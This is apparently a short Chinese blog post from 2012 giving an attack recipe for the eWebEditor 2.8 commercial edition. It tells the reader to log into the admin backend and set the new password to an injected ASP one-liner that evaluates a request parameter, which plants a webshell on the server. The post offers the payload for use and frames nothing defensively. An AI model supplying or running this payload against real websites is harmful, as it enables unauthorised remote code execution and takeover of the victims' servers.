chengker

低调求发展

ewebeditor后台插一句话拿webshell

影响版本:ewebeditor2.8 商业版

攻击利用:登陆后台,点击修改密码---新密码设置为

  1. 1":eval request("a")’ 

 

2012-12-21 /  标签 : 编辑器漏洞 1
评论
热度(1)